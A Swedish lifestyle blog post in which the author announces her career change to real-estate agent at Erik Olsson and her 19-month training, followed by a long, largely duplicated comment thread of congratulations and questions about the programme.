Jag ska bli fastighetsmäklare, på Erik Olsson!

IMG_5086

Hej fina!

Nu ska jag ÄNTLIGEN berätta vad jag velat berätta under en längre period! Anledningen att jag inte berättat ännu är för att det är flera parter inblandade, uppdragsgivare, min nya chef, myndighet, studie start ( man kan börja med ett par veckors mellanrum), blivande kollegor OCH studiekamrater☺️

Detta och andra yttre faktorer har spelat stor roll under denna process, inför när jag officiellt kan berätta vad jag sadlar om till. 

Du som följt mig ett tag vet om att jag varit entreprenör i hela mitt vuxna liv. Flera företag, butik, grossistverksamhet, VD, Chef, bloggare, influenser, Personlig tränare, konsult, och ständigt en massa projekt på G. Alltid målinriktad, hungrig på att lära mig och att utvecklas.

Vissa inspireras, andra kan inte förställa sig min typ av livstil och det tempo som jag håller. Men alla är vi olika. (Tur är väl det… )

Jag tex, skulle ALDRIG stå ut med ett 8-16 jobb, mån-fre. Inte för att jag tycker att det är något fel med det. Verkligen inte! Utan för att mitt psyke och mitt sätt att vara som människa, företagare, privat och jobb aldrig skulle vara tillfreds med det. Det skulle krypa i kroppen på mig av tristess.

Svårt att förklara. mer om det i ett senare inlägg ( en cliffhanger, hehe! 😉)  

Påtal om personlig tränare… jag har varit en sidekick inom wellnesbranchen, i ca 5 år.

Jag har varit med på träningsresor, träningsevent och liknande uppdrag. 

Min roll har varierat. Jag har varit med som skribent, arrangör, influenser, föreläsare, maskot, pepp och inspiratör.

Träningen har och betyder enormt mycket för mig. jag har själv gjort en viktresa ner från drygt 100 kg. jag vet hur viktig träningen är för både kopp och själ. Inte minst min psykiska hälsa. Allting hänger ihop.

jag brinner för att peppa och motivera andra. Det gör jag fortfarande, även om jag inte bloggar om det.

Anledningen till att jag förra året utbildade mig till Personlig tränare och instruktör ( samt grunder inom kost). Det var just för att bredda min kunskap, och för att vara ”mer” än bara maskot, pepp, inspiratör osv på träningsresor event och annat.

Jag kommer FORTSÄTTA inom träningsbranchen trots mitt karriärbyte. Precis som jag gjort tidigare, som sidekick. Men då kan jag själv vara instruktör & PT! Om jag vill. 

-Vilket jag Älskar!!!!

Så med andra ord, det var aldrig min plan från början att jobba heltid som PT. Min plan och mina målsättningar har uppnåtts. Nu börjar nästa kapitel i mitt liv.

Där träningen kommer att finnas med på regelbunden basis i min vardag👊🏻💪🏻

bild-1966

Men nu innan jag berättar,  så måste jag bara säga att alla jag verkligen skrattar här hemma för mig själv när jag läser vissa kommentarer. 😂🙈 Nyfikenheten är maximal och man avskyr att jag inte sagt någonting! Förlåt, men allting måste lixom hänga ihop… Precis som jag skrev, yttre faktorer spelar också in. 

-Jösses amalia!🙈

Gillar du inte mig, min blogg ,mitt utsende, mitt karriärsval, mitt sätt att skriva osv…

-LÄS INTE!

Vi ska inte hålla på att skapa dålig stämning och vara otrevliga. Det går BORT!

-Hur svårt ska det va? 🤷‍♀️

bild-1964

Nu till det som jag hållet för mig själv under x-antal månader ☺️

-Jag ska bli FASTIGHETSMÄKLARE!

Jag kan nu stolt berätta att jag nu är anställd av Mäklarbyrån Erik Olsson🙏🏻🌟 

Erik Olsson finns i Stockholm, Malmö & Göteborg.

Det är så sjukt kul!  Jag är stolt, glad, tacksam och sååååå hungrig på att ta mig igenom studierna och börja mäkla!☺️

Denna branschen har tilltalat mig under flera års tid. men först nu är det ”rätt” i tiden för mig. jag är 29 år gammal. Med en ryggsäck full av erfarenheter som jag ska bära med mig och föröka göra något bra utav…

Så nu j*klar ska jag kavla upp ärmarna😅💪🏻  Se till att ha fokus, struktur, och disciplin.

Det finns nämligen, INGET utrymme för att inte ligga annat än i fas! På något plan! 

Utbildningen är 19 månader. På högskolenivå. Vi läser just nu Extern marknadsföring, (bokföring) 📚🗃🖊vi kommer att köra två kurser åt gången. Fastighetsförmedling, fastighetsvärdering, juridik osv..

 Jag är så glad att jag nästan spricker! Detta är en dröm som slår in.. Eller nej. Inte en dröm som ”slår in”. Nu ska jag vara osvensk! och skryta lite…

Detta är en dröm som jag jobbat VÄLDIGT hårt för att få möjligheten att genomföra! Som jag skrivit tidigare… 

-Vänta inte på bättre tider… skapa dom själv!

 Du kommer genom bloggen att fortfarande att få följa min vardag, som mamma, mäklarstuderadne, bloggare, influenser, entreprenör,  och…. flickvän! hehe!

Måste fortsätta öva på att säga ordet pojk/flickvän. Jag har varit singel såååå länge att jag reagerar varje gång jag skriver eller säger det. Jonas är verkligen fin i detta. (Och allt annat) 

Han har stöttat mig sen dag 1 ❤️🙏🏻

IMG_5444

Erik Olssons slogan,  

🔸Bäst betalt i kvadrat 🔸

Så…. När du ska sälja eller värdera din bostad. Då vet du vart du kontaktar mig…. 😉

Kram

/ My Martens 

362 Komentarer

 1. Wow så kul! Spännande bransch o nog ett yrke som kommer passa dig klockrent! Har en gammal studiekompis som jobbar på byrån i Sthlm ? Jag funderar självklart massor på hur du ska kunna jobba på plats i Sthlm enbart varannan vecka när du väl är klar men jag antar att du har en plan för det! Stort lycka till med studierna!

 2. Men åhhhhhhh vad roligt!! Vilken grej. Blir typ avis ? På riktigt My, detta måste du vara som klippt och skuren för. Åter igen, shit vad roligt. Kramar och lycka till i massor till dig du sköna böna ???????????

 3. Hurra vad du är duktig det kommer att gå jättebra för dej. Har handlat blommor av dej sedan du startade förstod redan då att du kommer att gå långt,lycka till.

 4. Wow så glad för dig, som du kämpar, du kan uppnå vad du vill. Du är en enorm förebild för andra och jag hoppas att du verkligen, verkligen är sjukt stolt och nöjd över dig själv. Grattis!

 5. Grattis och lycka till.
  Men att säga att folk ska sluta läsa eller försvinna för att de undrar och har åsikter är det inte lite överdrivet så länge man uppför sig och inte går till personangrepp, tycker alltid du har välkomnat sådant istället för att bara säga ja och vad bra och gulligt till allt.

  • Det har jag INTE sagt! Jag har sagt att om man inte tycker om mig/bloggen så bör man inte läsa den ☺️ DET står jag för ☺️ Jag tar inte längre skit, med skit så menar jag INTE en annan åsikt eller en fråga ☺️ Tack ?

 6. Grattis??Fy fan vad stark du är. Allt du varit utsatt för förra året,skulle inte många klarat av. Och ändå påstår ”tanterna”(som någon kallar dem)?att det inte är mobbing.Har följt din blogg länge (Är dålig på att komentera),även dem andra bloggarna och även dem vidriga komentarer från dem.(många raderade) Men var glad att du kom ifrån dem.Grattiskramar?

 7. Åhhh vad kul och vilket klokt karriärval! Har jobbat som sekreterare på en mäklarfirma i min ungdom och lärde mig en hel del och fick även chansen att ha vissa visningar på lägenheter. Sen sadlade jag om och satsade på försäkringsbranschen som passade mig lite bättre. Stort lycka till och det ska bli grymt kul och följa dig i framtiden! Stor kram ❤️

 8. Du är fantastisk mamma My. En sån kämpe du är. Detta valet kan inte bli bättre. Så bra det passar dig. Så kul att få vara med dig här i bloggen redan från start på din väg mot en duktig mäklare. Lillemans morsa är verkligen inte vilken morsa som helst. Kram ??

 9. Men alltså tja bruden som överraskar ” titt som tätt” .?? alltså är du Einstein lr? På riktigt hehe. En får aldrig bli rålös när en klickar sig in på din blogg……..du är så duktig och miljoner gånger grattis till dig o lycka till. Bamse kram! ??

 10. Grattis!!! Wow vad kul och häftigt ???. Förstår att du ej kunnat berätta innan ?. Sträck på dig MY och klappa dig själv på axeln ??, för du är så cool och vågar testa nya saker och göra vägval ??.
  Kram o natti ??
  Tina

 11. Wow så kul! Spännande bransch o nog ett yrke som kommer passa dig klockrent! Har en gammal studiekompis som jobbar på byrån i Sthlm 🙂 Jag funderar självklart massor på hur du ska kunna jobba på plats i Sthlm enbart varannan vecka när du väl är klar men jag antar att du har en plan för det! Stort lycka till med studierna!

 12. Stort Grattis fina My! ? Har läst din blogg länge, men brukar inte kommentera. Du är en imponerande stark tjej med driv, målmedvetenhet och skinn på näsan och det är så roligt att det går bra, att du är glad & lycklig ?

 13. Hej
  Super kul detta för dig har följt dig i många år
  Kommer du enbart jobba med detta i Stockholm eller är de ngt du även kommer göra på ön
  Får gärna värdera vårt hur

 14. Men åhhhhhhh vad roligt!! Vilken grej. Blir typ avis 🙈 På riktigt My, detta måste du vara som klippt och skuren för. Åter igen, shit vad roligt. Kramar och lycka till i massor till dig du sköna böna 💃🏼👏🏻🍾💼🏘🏡🏠🏢💖

 15. Hurra vad du är duktig det kommer att gå jättebra för dej. Har handlat blommor av dej sedan du startade förstod redan då att du kommer att gå långt,lycka till.

 16. Wow så glad för dig, som du kämpar, du kan uppnå vad du vill. Du är en enorm förebild för andra och jag hoppas att du verkligen, verkligen är sjukt stolt och nöjd över dig själv. Grattis!

 17. Grattis och lycka till.
  Men att säga att folk ska sluta läsa eller försvinna för att de undrar och har åsikter är det inte lite överdrivet så länge man uppför sig och inte går till personangrepp, tycker alltid du har välkomnat sådant istället för att bara säga ja och vad bra och gulligt till allt.

  • Det har jag INTE sagt! Jag har sagt att om man inte tycker om mig/bloggen så bör man inte läsa den ☺️ DET står jag för ☺️ Jag tar inte längre skit, med skit så menar jag INTE en annan åsikt eller en fråga ☺️ Tack 💖

 18. Grattis💪👊Fy fan vad stark du är. Allt du varit utsatt för förra året,skulle inte många klarat av. Och ändå påstår ”tanterna”(som någon kallar dem)😉att det inte är mobbing.Har följt din blogg länge (Är dålig på att komentera),även dem andra bloggarna och även dem vidriga komentarer från dem.(många raderade) Men var glad att du kom ifrån dem.Grattiskramar💞

 19. Åhhh vad kul och vilket klokt karriärval! Har jobbat som sekreterare på en mäklarfirma i min ungdom och lärde mig en hel del och fick även chansen att ha vissa visningar på lägenheter. Sen sadlade jag om och satsade på försäkringsbranschen som passade mig lite bättre. Stort lycka till och det ska bli grymt kul och följa dig i framtiden! Stor kram ❤️

 20. Du är fantastisk mamma My. En sån kämpe du är. Detta valet kan inte bli bättre. Så bra det passar dig. Så kul att få vara med dig här i bloggen redan från start på din väg mot en duktig mäklare. Lillemans morsa är verkligen inte vilken morsa som helst. Kram 💖💖

 21. Men alltså tja bruden som överraskar ” titt som tätt” .😂😂 alltså är du Einstein lr? På riktigt hehe. En får aldrig bli rålös när en klickar sig in på din blogg……..du är så duktig och miljoner gånger grattis till dig o lycka till. Bamse kram! 💗💗

 22. Grattis!!! Wow vad kul och häftigt 👏👏👏. Förstår att du ej kunnat berätta innan 😉. Sträck på dig MY och klappa dig själv på axeln 😉😊, för du är så cool och vågar testa nya saker och göra vägval 👍😘.

  Kram o natti 😘😴
  Tina

 23. Stort Grattis fina My! 🌸 Har läst din blogg länge, men brukar inte kommentera. Du är en imponerande stark tjej med driv, målmedvetenhet och skinn på näsan och det är så roligt att det går bra, att du är glad & lycklig 💖

 24. Hej
  Super kul detta för dig har följt dig i många år
  Kommer du enbart jobba med detta i Stockholm eller är de ngt du även kommer göra på ön
  Får gärna värdera vårt hur

 25. Ett riktigt stort grattis My 😊 till ditt nya yrke. Hoppas att du kommer att trivas och att det kommer att gå riktigt bra för dig.🏠 Kram 🐞

 26. Wow Grattis
  Så himla cool att du vågar allt alltid.
  Rolig och även ledsam blogg.
  Läser nästan varje dag sedan ett år tillbaka.
  Kämpa på My.
  Kram Viktoria

 27. Jättegrattis!!! Wooow va kul o vilken utmaning!! All all lycka till du är såå duktig o drivande sp kommer gå strålande!! Jag hejar på dig alla dagar i veckan! Kram?????❤

 28. Bortsett från att du inte tar hänsyn till vad många av dina lösare vill, utan fortsätter rabbla hela ditt liv i ett och samma andetag så önskas du ett stort lycka till.

 29. Stort grattid fina My. OMG vilken dröm! Vad kul att du kan prova på lite allt möjligt och skapar ditt liv precis som du vill ha det. Jag är så glad för din skull, Herre Gud om någon förtjänra det så är det DU. ?
  Vilken skola kommer du ta utbildningen igenom? Vore mycket värt för mig att få sånt tips, snälla. <3

 30. Stort Grattis My. Härligt att du satsar på detta. En härlig framtidsplanering o ett spännande yrke, i alla fall här i Stockholm. Bor inte långt ifrån din kommande arbetsplats o passerar där dagligen, så vi kommer säkert att ses. Då ska du få en stor kram från den 70 åriga tanten på väg till gymmet. Kram?

 31. Tack för ditt svar ang fisk/skaldjursrestaurang i Sthlm.
  Ytterligare en fråga….hur vet man om man har delade magmuskler t.ex efter barnafödande?
  Kram igen

  • Det kna man känna med fingrarna (om man vet hur man sk avkänna) Men gå till en läkare, dom sk akuta visa det. En mamma/gravid pt ska också kunna känna det =) Kram

 32. Wow Grattis
  Så himla cool att du vågar allt alltid.
  Rolig och även ledsam blogg.
  Läser nästan varje dag sedan ett år tillbaka.
  Kämpa på My.
  Kram Viktoria

 33. Vad roligt ! Jag tror du kommer passa perfekt, resultatinriktad,social,representativ, positiv.
  Verkligen roliga nyheter, stort grattis och lycka till My!! Kram ?

 34. Grattis My 😊Du är en sann entreprenör ända ut i fingerspetsarna! Om nån fixar det så är det du 👍🏻 Grattis till kärleken ❤️ Kram

 35. Jättegrattis!!! Wooow va kul o vilken utmaning!! All all lycka till du är såå duktig o drivande sp kommer gå strålande!! Jag hejar på dig alla dagar i veckan! Kram🙏🏻🙌🏻🌟❤

 36. Bortsett från att du inte tar hänsyn till vad många av dina lösare vill, utan fortsätter rabbla hela ditt liv i ett och samma andetag så önskas du ett stort lycka till.

 37. Grattis, va spännande!
  Jag är nästan 50 fyllda och har också funderat på att skola om mig. Nu eller aldrig ☺️. Men jag har upptäckt att jag knappt är behörig ? till de högskoleutbildningar jag har tittat på. (Gick 3-årig Ekonomisk). Du har skrivit att du inte ens har gått gymnasiet. Hur löser du det? Tar gärna emot tips på hur man skaffar sig behörighet. För mig är det främst matte och naturkunskap som saknas. Eller behövs kanske ingen behörighet för att läsa till mäklare? En till nyfiken fråga, vad blev du anställd som på mäklarbyrån? Eller menar du att du har dina praktikveckor där? Antar att studierna är 100% för att hinna få ihop 120 poäng.

 38. Stort grattid fina My. OMG vilken dröm! Vad kul att du kan prova på lite allt möjligt och skapar ditt liv precis som du vill ha det. Jag är så glad för din skull, Herre Gud om någon förtjänra det så är det DU. 😀
  Vilken skola kommer du ta utbildningen igenom? Vore mycket värt för mig att få sånt tips, snälla. <3

 39. Stort Grattis My. Härligt att du satsar på detta. En härlig framtidsplanering o ett spännande yrke, i alla fall här i Stockholm. Bor inte långt ifrån din kommande arbetsplats o passerar där dagligen, så vi kommer säkert att ses. Då ska du få en stor kram från den 70 åriga tanten på väg till gymmet. Kram😊

 40. Wow wow wow, säger jag bara o ett Stort Lycka Till❤️ Du gör ”slarvsylta” av alla de som varit elaka mot dig????. Du e helt enorm o tar det ena steget efter det andra, medan mobbarna gör samma vanliga. Man baxnar över ditt driv ! Jag e så glad för din skull. Hurra???❤️

 41. Tack för ditt svar ang fisk/skaldjursrestaurang i Sthlm.
  Ytterligare en fråga….hur vet man om man har delade magmuskler t.ex efter barnafödande?
  Kram igen

  • Det kna man känna med fingrarna (om man vet hur man sk avkänna) Men gå till en läkare, dom sk akuta visa det. En mamma/gravid pt ska också kunna känna det =) Kram

 42. Vad roligt ! Jag tror du kommer passa perfekt, resultatinriktad,social,representativ, positiv.
  Verkligen roliga nyheter, stort grattis och lycka till My!! Kram 🙂

 43. Man måste få prova på olika saker, inget man gör måste vara för evigt. Tkr egentligen inte ens du ska behöva förklara det för dina läsare. Jag känner igen mig mycket i dig, vad gäller tankar kring jobb och vara tillfreds. Har också precis hittat min roll här i livet, vad jag vill och vad jag mår bra utav. Vägen dit har inte varit spikrak men alla erfarenheter längs vägen har ju lett mig hit, så allt händer nog av en anledning ? Fortsätt följa ditt hjärta! Dom som av nån anledning skulle ha åsikter om det är nog helt enkelt inte nöjda med sitt eget och rädda för att våga! Kram på dig

 44. Grattis, va spännande!
  Jag är nästan 50 fyllda och har också funderat på att skola om mig. Nu eller aldrig ☺️. Men jag har upptäckt att jag knappt är behörig 🙈 till de högskoleutbildningar jag har tittat på. (Gick 3-årig Ekonomisk). Du har skrivit att du inte ens har gått gymnasiet. Hur löser du det? Tar gärna emot tips på hur man skaffar sig behörighet. För mig är det främst matte och naturkunskap som saknas. Eller behövs kanske ingen behörighet för att läsa till mäklare? En till nyfiken fråga, vad blev du anställd som på mäklarbyrån? Eller menar du att du har dina praktikveckor där? Antar att studierna är 100% för att hinna få ihop 120 poäng.

 45. ? Hej My! ? GRATTIS OCH LYCKA TILL!!!!! Du är så målmedveten och det beundrar jag! Så häftigt att få följa dig i allt! Bra val att du blir mäklare för som du skriver så gillar du ju att vara flexibel och då tror jag mäklar yrket passar dig perfekt! Stor kram till dig starka fina My ???

 46. Wow wow wow, säger jag bara o ett Stort Lycka Till❤️ Du gör ”slarvsylta” av alla de som varit elaka mot dig👊🏻👏👏. Du e helt enorm o tar det ena steget efter det andra, medan mobbarna gör samma vanliga. Man baxnar över ditt driv ! Jag e så glad för din skull. Hurra👍👊🏻❤️

 47. Man måste få prova på olika saker, inget man gör måste vara för evigt. Tkr egentligen inte ens du ska behöva förklara det för dina läsare. Jag känner igen mig mycket i dig, vad gäller tankar kring jobb och vara tillfreds. Har också precis hittat min roll här i livet, vad jag vill och vad jag mår bra utav. Vägen dit har inte varit spikrak men alla erfarenheter längs vägen har ju lett mig hit, så allt händer nog av en anledning 😊 Fortsätt följa ditt hjärta! Dom som av nån anledning skulle ha åsikter om det är nog helt enkelt inte nöjda med sitt eget och rädda för att våga! Kram på dig

 48. 💕 Hej My! 😀 GRATTIS OCH LYCKA TILL!!!!! Du är så målmedveten och det beundrar jag! Så häftigt att få följa dig i allt! Bra val att du blir mäklare för som du skriver så gillar du ju att vara flexibel och då tror jag mäklar yrket passar dig perfekt! Stor kram till dig starka fina My 💕😀💕

 49. Tänk vad du kan efter allt jobbigt så tar du nya tag! Nu går det bara uppåt hoppas det får fortsätta så. Det är du värd efter all skit. Kram från hjärtat My???

 50. Spännande! Jag undrar du skriver att du är anställd och ska plugga 19 månader. Får du betalt under tiden från Erik Ohlsson eller tar du egna studielån? Har en son som är intresserad av utbildningen.

  • Har samma fråga och om hur man får kontakten med fastighetsmäklaren innan man är färdig, är det något man får söka själv eller hjälper skolan till med detta, är det en ”riktig” tjänst eller praktik.

   • En tjänst. Att vara anställd är inte samma sak som att ha en yrkespraktik. Däremot kräver mäklarutbildningen att man har en yrkespraktik UTÖVER eventuell anställning. Dessutom KRÄVER utbildningen att ALLA är anställda av en mäklarbyrån, annars får man inte utföra utbildningen enligt FMI. (Fastighets mäklar inspektionen ) ja, hur gör man…. det finns säkerligen många vägar att gå. Individuellt från person till person. Jag bestämde mig, samlade mod, trodde på mig själv… och sökte tjänsten, hamnade på en intervju, fick fortsätta vidare genom en rekryterings process och nu är jag här. Hur skulle du själv göra? Berätta gärna ☺️

    • Det var en ren och skär fråga inget annat förstår fortfarande inte varför du ska behöva svara på det här lite nedlåtande sättet och ja jag skulle absolut ha gjort på samma sätt som du om jag hade vetat vad som gällde för utbildningen (vilket jag inte gjorde eftersom jag frågade).

     • Nedlåtande? Vad pratar du om? Jag svarade artigt, tydligt och väldigt korrekt. Utan minsta nedlåtande ton! haha! ??☺️Snacka om att man kan göra sjukt felaktiga tolkningar genom skrift…. jaja… sorry att jag tog mig tiden att svar ☺️ Klickade precis på ditt ip nr, för att se tidigare historik på dina kommentarer. Du kommenterar återupprepat om huruvida jag kommenterar, osv… Försök att föreställa dig en varm, mjuk, ton bakom mina kommentarer…. ingenting annat ☺️

 51. Åh vad roligt My – grattis!! Jag har ju skrivit förut att du är ett sånt bra föredöme som mamma, kämpe osv osv och det gäller ju verkligen nu också! Låter som att mäklarjobbet passar dig perfekt, och ska man hitta en nish så vore det väl super för dig med tjejer/killar som har jobb/karriär på G och flyttar från mindre orter till Stockholm och vill ha coola/bra lgh och tips osv. Eller vad vet jag – du hittar såklart själv en nish bara en idé ? Också nyfiken på din plan för Ölands-veckorna – har ju sett Toppmäklarna och Million Dollar Listing NY ? och har förstått att det är jätteviktigt att kunna vara tillgänglig lite närsom helst för kunderna, kunna visa objekt på tider då det passar kunden osv osv. Kanske kan du mäkla på Öland också?! ? Grattis igen!!

 52. Hej My! Vill gratulera dig och samtida höja dig till skyarna faktiskt. Du har ju haft det väldigt kämpigt av olika anledningar och det hade varit väldigt lätt att bara fortsätta i skiten och bara lunkat på liksom.
  Att du nu väljer att sätta dig på skolbänken o studera till något du brinner för och kämpa för att du ska få leva ett bra liv o trivas är stort. Kul att följa en blogg med en sådan anda!! Stort LYCKA TILL!!

 53. Tänk vad du kan efter allt jobbigt så tar du nya tag! Nu går det bara uppåt hoppas det får fortsätta så. Det är du värd efter all skit. Kram från hjärtat My💖💟💜

 54. Spännande! Jag undrar du skriver att du är anställd och ska plugga 19 månader. Får du betalt under tiden från Erik Ohlsson eller tar du egna studielån? Har en son som är intresserad av utbildningen.

  • Har samma fråga och om hur man får kontakten med fastighetsmäklaren innan man är färdig, är det något man får söka själv eller hjälper skolan till med detta, är det en ”riktig” tjänst eller praktik.

   • En tjänst. Att vara anställd är inte samma sak som att ha en yrkespraktik. Däremot kräver mäklarutbildningen att man har en yrkespraktik UTÖVER eventuell anställning. Dessutom KRÄVER utbildningen att ALLA är anställda av en mäklarbyrån, annars får man inte utföra utbildningen enligt FMI. (Fastighets mäklar inspektionen ) ja, hur gör man…. det finns säkerligen många vägar att gå. Individuellt från person till person. Jag bestämde mig, samlade mod, trodde på mig själv… och sökte tjänsten, hamnade på en intervju, fick fortsätta vidare genom en rekryterings process och nu är jag här. Hur skulle du själv göra? Berätta gärna ☺️

    • Det var en ren och skär fråga inget annat förstår fortfarande inte varför du ska behöva svara på det här lite nedlåtande sättet och ja jag skulle absolut ha gjort på samma sätt som du om jag hade vetat vad som gällde för utbildningen (vilket jag inte gjorde eftersom jag frågade).

     • Nedlåtande? Vad pratar du om? Jag svarade artigt, tydligt och väldigt korrekt. Utan minsta nedlåtande ton! haha! 🙈😂☺️Snacka om att man kan göra sjukt felaktiga tolkningar genom skrift…. jaja… sorry att jag tog mig tiden att svar ☺️ Klickade precis på ditt ip nr, för att se tidigare historik på dina kommentarer. Du kommenterar återupprepat om huruvida jag kommenterar, osv… Försök att föreställa dig en varm, mjuk, ton bakom mina kommentarer…. ingenting annat ☺️

 55. Åh vad roligt My – grattis!! Jag har ju skrivit förut att du är ett sånt bra föredöme som mamma, kämpe osv osv och det gäller ju verkligen nu också! Låter som att mäklarjobbet passar dig perfekt, och ska man hitta en nish så vore det väl super för dig med tjejer/killar som har jobb/karriär på G och flyttar från mindre orter till Stockholm och vill ha coola/bra lgh och tips osv. Eller vad vet jag – du hittar såklart själv en nish bara en idé 🙂 Också nyfiken på din plan för Ölands-veckorna – har ju sett Toppmäklarna och Million Dollar Listing NY 🙂 och har förstått att det är jätteviktigt att kunna vara tillgänglig lite närsom helst för kunderna, kunna visa objekt på tider då det passar kunden osv osv. Kanske kan du mäkla på Öland också?! 🙂 Grattis igen!!

 56. Hej My! Vill gratulera dig och samtida höja dig till skyarna faktiskt. Du har ju haft det väldigt kämpigt av olika anledningar och det hade varit väldigt lätt att bara fortsätta i skiten och bara lunkat på liksom.

  Att du nu väljer att sätta dig på skolbänken o studera till något du brinner för och kämpa för att du ska få leva ett bra liv o trivas är stort. Kul att följa en blogg med en sådan anda!! Stort LYCKA TILL!!

 57. Bara så du vet så är du min förebild i så mycket ? Du vågar satsa när så många skulle ha backat.
  Lycka till med allt du tar dig för. Jag tror att du kommer att bli en otroligt kompetent som mäklare.
  Stor kram till dig!

 58. Så roligt och spännande ?! Stort grattis ??!! Blir så sugen på att plugga igen när jag läser ditt inlägg, man måste våga här i livet och byta karriär är bara bra tror jag ?!
  Själv var jag först undersköterska, blev sedan egenföretagare innan jag bestämde mig för att plugga till redovisningssekonom. Nu börjar jag bli sugen på att vidareutbilda mig / starta nåt eget ??!

 59. Bara så du vet så är du min förebild i så mycket 💕 Du vågar satsa när så många skulle ha backat.

  Lycka till med allt du tar dig för. Jag tror att du kommer att bli en otroligt kompetent som mäklare.

  Stor kram till dig!

 60. Så roligt och spännande 😀! Stort grattis 😀💕!! Blir så sugen på att plugga igen när jag läser ditt inlägg, man måste våga här i livet och byta karriär är bara bra tror jag 😊!

  Själv var jag först undersköterska, blev sedan egenföretagare innan jag bestämde mig för att plugga till redovisningssekonom. Nu börjar jag bli sugen på att vidareutbilda mig / starta nåt eget 😊👍!

 61. Coolt att bli mäklare! Men får du börja jobba samtidigt som du pluggar i 19 mån, eller hur funkar det? Alltså får man lön medan man pluggar? Förklara gärna, vet inte alls hur det funkar?
  Lycka till hur som helst!!! ?

  • Tack så mycket ☺️?? Det är individuellt…. jag kommer jobba samtidigt på EO. Samt med mitt AB som jag driver idag.. vissa jobbar heltid? Andra deltid, vissa endast studier… som sagt individuellt… ☺️

 62. Mäklarutbildning är ju på Högskolenivå? Inga speciella krav för att kunna gå? Som matte (som bör vara viktigt) språk eller liknande eller är det en genväg att gå genom att först bli anställd ?
  Jag som köpare skulle inte anlita en mäklare med den sloganen, låter ju som det bara gäller få så högt som möjligt? Men det ska finnas en köparens marknad också.
  Jag tex skulle aldrig kunna jobba som vare sig mäklare eller bilförsäljare för alla de lägger på för mycket pengar
  Den firma som skulle anställa mig skulle riskera gå i konkurs snabbt för jag skulle vara för snäll ?
  Men du, lycka till !

  • ????? Särskilda krav? Jo, en hel del krav… Samma lika för ALLA mäklare.sjult höga krav på utbildningen. Min största utmaning hittills! Men jag ska klara det!
   Läs på om du är nyfiken ☺️
   En slogan som EO lever upp till och som gynnar alla parter ??

   • Grattis My till din utbildning, vad spännande för dig ?
    Samhällskunskap 1b och Matematik 3 behövs såg jag har du den behörigheten. Eller har man möjlighet att komma med ändå.

    • Postat 2017-09-07 kl. 18:03 | Som svar till My.
     ”Ta hand om dig också My! Jag önskar dig all lycka i framtiden och med livet. Detta är samtidigt min sista kommentar.”

 63. Coolt att bli mäklare! Men får du börja jobba samtidigt som du pluggar i 19 mån, eller hur funkar det? Alltså får man lön medan man pluggar? Förklara gärna, vet inte alls hur det funkar?
  Lycka till hur som helst!!! 🙂

  • Tack så mycket ☺️🙏🏻 Det är individuellt…. jag kommer jobba samtidigt på EO. Samt med mitt AB som jag driver idag.. vissa jobbar heltid? Andra deltid, vissa endast studier… som sagt individuellt… ☺️

 64. Mäklarutbildning är ju på Högskolenivå? Inga speciella krav för att kunna gå? Som matte (som bör vara viktigt) språk eller liknande eller är det en genväg att gå genom att först bli anställd ?
  Jag som köpare skulle inte anlita en mäklare med den sloganen, låter ju som det bara gäller få så högt som möjligt? Men det ska finnas en köparens marknad också.
  Jag tex skulle aldrig kunna jobba som vare sig mäklare eller bilförsäljare för alla de lägger på för mycket pengar
  Den firma som skulle anställa mig skulle riskera gå i konkurs snabbt för jag skulle vara för snäll 😂
  Men du, lycka till !

  • 😂😂😂😂😂 Särskilda krav? Jo, en hel del krav… Samma lika för ALLA mäklare.sjult höga krav på utbildningen. Min största utmaning hittills! Men jag ska klara det!
   Läs på om du är nyfiken ☺️

   En slogan som EO lever upp till och som gynnar alla parter 👍🏻

   • Grattis My till din utbildning, vad spännande för dig 🙂

    Samhällskunskap 1b och Matematik 3 behövs såg jag har du den behörigheten. Eller har man möjlighet att komma med ändå.

    • Postat 2017-09-07 kl. 18:03 | Som svar till My.
     ”Ta hand om dig också My! Jag önskar dig all lycka i framtiden och med livet. Detta är samtidigt min sista kommentar.”

 65. STORT GRATTIS till dig från mig!
  Härligt att se att du har det bra.
  Du är så värd det som du kämpar!
  Att inte ta skit eller ha skinn på näsan är bra.
  Men glöm aldrig att det coolaste som finns är att vara ödmjuk och kärleksfull även när man är riktigt framgångsrik i det man gör ( enligt mig iallafall )
  Var härliga My även när folk är jobbiga. Svårt men det kommer du vinna på i längden!
  Men jag förstår att det är en svår balansgång.
  ❤️

  • Tack Doris ??❤️Jag håller helt med dig… Mem till en viss gräns. Sen räcker det, även för mig ☺️ Men som du skriver… det är en svår balansgång ☺️ Kram

 66. STORT GRATTIS till dig från mig!
  Härligt att se att du har det bra.
  Du är så värd det som du kämpar!
  Att inte ta skit eller ha skinn på näsan är bra.
  Men glöm aldrig att det coolaste som finns är att vara ödmjuk och kärleksfull även när man är riktigt framgångsrik i det man gör ( enligt mig iallafall )
  Var härliga My även när folk är jobbiga. Svårt men det kommer du vinna på i längden!
  Men jag förstår att det är en svår balansgång.
  ❤️

  • Tack Doris 🙏🏻❤️Jag håller helt med dig… Mem till en viss gräns. Sen räcker det, även för mig ☺️ Men som du skriver… det är en svår balansgång ☺️ Kram

 67. Hej! Alltså förlåt att jag tjatar men har läst igenom kommentarer men kan inte hitta att du svarat på vart du läser utbildningen? Är själv väldigt sugen på yrket så därför jag är så nyfiken. Speciellt när det verkar vara kortare än Gävles 3 år. Hoppas på svar och lycka till! Du fixar galant! ???

 68. Hej! Alltså förlåt att jag tjatar men har läst igenom kommentarer men kan inte hitta att du svarat på vart du läser utbildningen? Är själv väldigt sugen på yrket så därför jag är så nyfiken. Speciellt när det verkar vara kortare än Gävles 3 år. Hoppas på svar och lycka till! Du fixar galant! 😊👍🏻

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

